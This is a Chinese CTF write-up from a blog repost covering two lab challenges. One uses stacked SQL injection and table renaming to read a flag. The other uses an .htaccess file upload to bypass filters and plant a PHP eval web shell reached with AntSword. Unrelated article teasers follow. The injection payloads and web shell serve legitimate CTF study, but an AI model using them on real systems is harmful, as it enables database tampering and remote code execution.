NSSCTF-Web题目10

目录

[强网杯 2019]随便注

1、题目

2、知识点

3、思路

[GXYCTF 2019]BabyUpload

1、题目

2、知识点

3、思路

[强网杯 2019]随便注

1、题目
2、知识点

数据库注入,堆叠注入,更改表名

3、思路

正常提交查询,看看数据回显

加入单引号'

?inject=1'

加上注释符,数据正常回显,说明当前是单引号的闭合问题

?inject=1' --+

判断当前表的字段数,说明当前表的字段数有2个

?inject=1' order by 3 --+

判断回显位置

?inject=1' and select 1,2 --+

发现select这些字段都被过滤了,采用大小写,双写都绕过不了

根据题目提示,存在堆叠注入,尝试一下

堆叠注入原理:

服务器端没有对执行数据库语句进行限制,导致可以执行多条数据库语句,php中的mysqli_multi_query函数可以执行多条数据库语句

没有对分号(;)进行过滤

改进:

使用mysqli_query()函数

对分号进行过滤

?inject=1';show databases --+

得到数据库名

还有另外一种方法得到当前数据库的名,这里回显了报错信息,所以使用报错注入函数

?inject=1' and extractvalue(1,concat(0x7e,database())) --+

数据库名:supersqli

判断表名

?inject=1';show tables --+

存在两个表: 1919810931114514、words

判断表的字段

这里表名要使用飘号`,而不是单引号'

1、两者在linux下和windows下不同,linux下不区分,windows下区分

2、在windows下引用数据库、表、索引、列和别名是需要用飘号(`)

?inject=1';show columns from `1919810931114514` --+

?inject=1';show columns from `words` --+

通过之前判断表的字段的有两个,结合这里的字段,判断当前的表为words

现在存在一个问题,select字段不能用,表又是words,不能直接获得flag字段的内容

看别人的wp才知道,alter和rename这两个字段没有被过滤,我们可以将words表改成1919810931114514,再改字段名

poc:

1';RENAME TABLE `words` TO `words1`;RENAME TABLE `1919810931114514` TO `words`;ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;show columns from words;--+

RENAME TABLE `words` TO `words1`  先将words表名改成words1

RENAME TABLE `1919810931114514` TO `words` 再将1919810931114514改成words

这样改表名才不会冲突

ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;

将1919810931114514表原来的flag字段名改成id这个名字,这样我们就可以通过搜索id得到flag

show columns from words 查看改完的结果

使用 1' or '1'='1

使用这样的payload是为了闭合 ' 而且不注释掉原本后面数据库的语句

得到flag:NSSCTF{eeaa7910-f2b4-4d94-831b-f5abd8f7c432}

[GXYCTF 2019]BabyUpload

1、题目

2、知识点

文件上传,.htaccess文件的利用

3、思路

这里我们上传一个正常的文件

发现上传不了,jpg、png、jpeg都尝试过了,上传后都是同一结果

经过我的测试,发现是文件内容太大了

重新上传正常图片

将原本的图片内容删掉,随便输入内容,发现可以上传成功,说明对文件大小做了限制

我们尝试上传php文件

发现对后缀名进行了过滤,也对内容进行了过滤

这里发现php的版本为5.6.23,算是比较旧的

尝试上传一个.htaccess文件,这个文件的作用就是可以执行图片里面的php、javascript代码

.htaccess:

<FilesMatch "flag.jpg"> #这一句的内容作用于后面上传的flag.jpg文件
SetHandler application/x-httpd-php
</FilesMatch>

上传成功

因为前面知道会检测文件的内容,php代码不行,我们可以尝试javascript的代码

flag.jpg:

##一句话木马

<script language='php'>eval($_POST[cmd]);</script>

上传成功,使用蚁剑进行连接

原本的url+upload/2acc77dfba671c79863c87009020349c/flag.jpg

在根目录下找到flag文件

得到flag:NSSCTF{d856bb6b-4b7e-48e2-a246-e3ab923562e2}

这篇文章就写到这里了,哪里不懂的或者不足的欢迎批评指正

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/30347.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

api-ms-win-crt-runtime-l1-1-0.dll文件丢失的情况要怎么处理?比较靠谱的多种修复方法分享

api-ms-win-crt-runtime-l1-1-0.dll文件丢失的情况要怎么处理?比较靠谱的多种修复方法分享

遇到api-ms-win-crt-runtime-l1-1-0.dll文件丢失的情况实际上是一个常见问题&#xff0c;解决此类问题存在多种方法。首先我们先来了解一下api-ms-win-crt-runtime-l1-1-0.dll文件吧&#xff0c;只有了解了我们才知道怎么去解决这个api-ms-win-crt-runtime-l1-1-0.dll文件丢失的…
阅读更多...
flutter 打包 exe

flutter 打包 exe

采用官方的MSIX打包 原文链接 https://blog.csdn.net/weixin_44786530/article/details/135308360 第一步&#xff1a;安装依赖 在项目根目录&#xff0c;执行命令&#xff1a; flutter pub add --dev msix 等待安装完成&#xff0c;就好了 第二步&#xff1a;打包编译 当m…
阅读更多...
LVGL开发教程-img图片

LVGL开发教程-img图片

系列文章目录 知不足而奋进 望远山而前行 目录 系列文章目录 文章目录 前言 1. 显示静态图像 2. 显示动态图像gif 3. 文件系统使用 总结 前言 在嵌入式系统中&#xff0c;使用LVGL&#xff08;Light and Versatile Graphics Library&#xff09;显示静态和动态图像是一…
阅读更多...
索引与书架、新华字典的爱恨情仇

索引与书架、新华字典的爱恨情仇

在MySQL的索引世界中&#xff0c;性能优化一直是开发者们关注的焦点。而索引&#xff0c;作为提升查询速度的关键技术之一&#xff0c;是非常重要的。索引根据存储类型可以分为聚簇索引(聚集)与非聚簇索引(非聚集)&#xff0c;它们决定了数据在磁盘上的存储方式和查询时的访问路…
阅读更多...
HANA 自动生成年月维度,指定起始即可生成

HANA 自动生成年月维度,指定起始即可生成

官方指导文档&#xff1a;SERIES_GENERATE Function (Series Data) | SAP Help Portal select * from SERIES_GENERATE_DATE(INTERVAL 1 MONTH, 2024-01-01, 2024-12-01) 以下示例生成范围从1999-01-01到1999-01-02的一系列时间戳&#xff0c;该时间戳以30秒的间隔递增&#…
阅读更多...
重生之 SpringBoot3 入门保姆级学习(24、场景整合 kafka 消息发送服务)

重生之 SpringBoot3 入门保姆级学习(24、场景整合 kafka 消息发送服务)

重生之 SpringBoot3 入门保姆级学习&#xff08;24、场景整合 kafka 消息发送服务&#xff09; 6.4 消息发送服务 6.4 消息发送服务 访问 kafka-ui &#xff08;注意这里需要换成你自己的服务器或者虚拟机的 IP 地址&#xff0c;虚拟机可以用局域网 192.168.xxx.xxx 的地址&…
阅读更多...
引领未来建筑潮流:轻空间设计团队打造“淄博珍珠”

引领未来建筑潮流:轻空间设计团队打造“淄博珍珠”

作为国内单体最大的气膜会展场馆&#xff0c;“淄博珍珠”自四年前启用以来&#xff0c;已成为淄博市的重要地标和经济引擎。该场馆首次亮相于第二十届中国&#xff08;淄博&#xff09;国际陶瓷博览会&#xff0c;凭借其独特的设计和先进的建筑理念&#xff0c;吸引了社会各界…
阅读更多...
机器人、人工智能相关领域 news/events (专栏目录)

机器人、人工智能相关领域 news/events (专栏目录)

Some Insights 一些机器人、人工智能或相关领域的news、events等 专栏直达链接 1. 智能制造 - 你需要了解的 10 个基本要素 2. 现实世界中的人工智能&#xff1a;工业制造的 4 个成功案例研究 3. 企业使用人工智能情况调查 4. 未来工厂中的人工智能&#xff1a;人工智能加…
阅读更多...
A comprehensive review of machine learning-based models for fake news detection

A comprehensive review of machine learning-based models for fake news detection

Abstract 互联网在假新闻传播中的作用使其成为一个严重的问题&#xff0c;需要复杂的技术来自动检测。为了应对 Facebook、Twitter、Instagram 和 WhatsApp 等社交媒体网站上误导性材料的快速传播&#xff0c;本研究探索了深度学习方法和各种分类策略领域。该研究特别调查了基…
阅读更多...
Linux安装kvm虚拟机

Linux安装kvm虚拟机

kvm是基于内核的虚拟机&#xff0c;为什么要用kvm不用vmware、virtual box… 只有一个原因&#xff0c;它非常快&#xff01;本机使用linux开发也是因为它快&#xff01;linux在老电脑上都能流畅运行&#xff0c;更别说现代电脑&#xff0c;如果你觉得装Linux并没有比win快多少…
阅读更多...
一文带你搞定Linux开发环境配置

一文带你搞定Linux开发环境配置

Linux开发必备 万事先更新 sudo apt update && sudo apt upgrade安装gcc工具链 sudo apt install build-essential像mysql、nacos等等建议装docker里&#xff0c;数据挂载到宿主机&#xff0c;日志别挂&#xff0c;直接装本机哪天日志塞满了就要开始重装系统了 以下…
阅读更多...
SpringCloud Alibaba Sentinel基础入门与安装

SpringCloud Alibaba Sentinel基础入门与安装

GitHub地址&#xff1a;https://github.com/alibaba/Sentinel 中文文档&#xff1a;https://sentinelguard.io/zh-cn/docs/introduction.html 下载地址&#xff1a;https://github.com/alibaba/Sentinel/releases Spring Cloud Alibaba 官方说明文档&#xff1a;Spring Clou…
阅读更多...
商淘云:服装实体店引流会员营销方案

商淘云:服装实体店引流会员营销方案

服装零售实体店面临着越来越大的挑战&#xff0c;尤其是在吸引和保持忠诚顾客方面。为了应对这一挑战&#xff0c;制定一套有效的引流会员营销方案显得尤为重要。商淘云将探讨如何通过创新的营销策略和增强的顾客体验&#xff0c;提升实体店的会员数量和销售业绩&#xff0c;从…
阅读更多...
浪潮信息内存故障预警技术再升级 服务器稳定性再获提升

浪潮信息内存故障预警技术再升级 服务器稳定性再获提升

浪潮信息近日对其内存故障智能预警修复技术进行了全面升级&#xff0c;再次取得技术突破。此次升级后&#xff0c;公司服务器的宕机率实现了80%锐降&#xff0c;再次彰显了浪潮信息在服务器技术领域的卓越能力。 浪潮信息全新升级服务器内存故障智能预警修复技术MUPR (Memory …
阅读更多...
2024年6月15日 (周六) 叶子游戏新闻

2024年6月15日 (周六) 叶子游戏新闻

期刊杂志: 聚合读者、意林、知音、故事会、花火以及国内各大知名报纸电子版&#xff0c;无需付费即可观看各种免费资源 中医自学宝典: 集合了中医医案&#xff0c;医经&#xff0c;方剂 药材知识的app&#xff0c;更方便的免费学习中医知识 《赛博朋克2077》被取消DLC泄露&…
阅读更多...
告别盲目决策!精益生产KPI指标管理系统让你的企业更聪明

告别盲目决策!精益生产KPI指标管理系统让你的企业更聪明

在当今快速变化的商业环境中&#xff0c;企业为了保持竞争力&#xff0c;需要高效地追踪、分析和优化各种业务指标。为了实现这一目标&#xff0c;越来越多的企业开始引入指标管理系统&#xff0c;这一工具在提升管理效率和促进业务增长方面发挥着至关重要的作用。 一、什么是…
阅读更多...
Neo4j 创建关系

Neo4j 创建关系

Neo4j 创建关系 在 Noe4j 中&#xff0c;关系是我们用来连接图的两个节点的元素。 这些关系具有数据的方向、类型和形式模式。 本章教你如何 建立关系在现有节点之间创建关系使用标签和属性创建关系 建立关系 我们可以使用 CREATE 子句创建关系。 我们将在方括号[]中指定关系…
阅读更多...
代理模式(静态代理/动态代理)

代理模式(静态代理/动态代理)

代理模式&#xff08;Proxy Pattern&#xff09; 一 定义 为其他对象提供一种代理&#xff0c;以控制对这个对象的访问。 代理对象在客户端和目标对象之间起到了中介作用&#xff0c;起到保护或增强目标对象的作用。 属于结构型设计模式。 代理模式分为静态代理和动态代理。…
阅读更多...
中国首例!「DataKit」上架亚马逊云科技 Marketplace add-ons

中国首例!「DataKit」上架亚马逊云科技 Marketplace add-ons

在 2022 年的 re:Invent 大会上&#xff0c;亚马逊云科技宣布了一项重大更新&#xff1a;亚马逊云科技 Marketplace 为 Amazon Elastic Kubernetes Service&#xff08;Amazon EKS&#xff09;提供了附加组件的支持。这一创新功能极大地丰富了 EKS 的生态系统&#xff0c;使用户…
阅读更多...
StarkNet System Architecture 系统架构

StarkNet System Architecture 系统架构

文章目录 Starknet架构排序器,证明器和节点、验证者、Starnet Core排序器 Sequencer证明器 Prover节点验证者StarkNet Core工作原理TransactionsStarknet架构 原文链接: https://david-barreto.com/starknets-architecture-review/#more-4602 StarkNet 有五个组成部分。分别…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023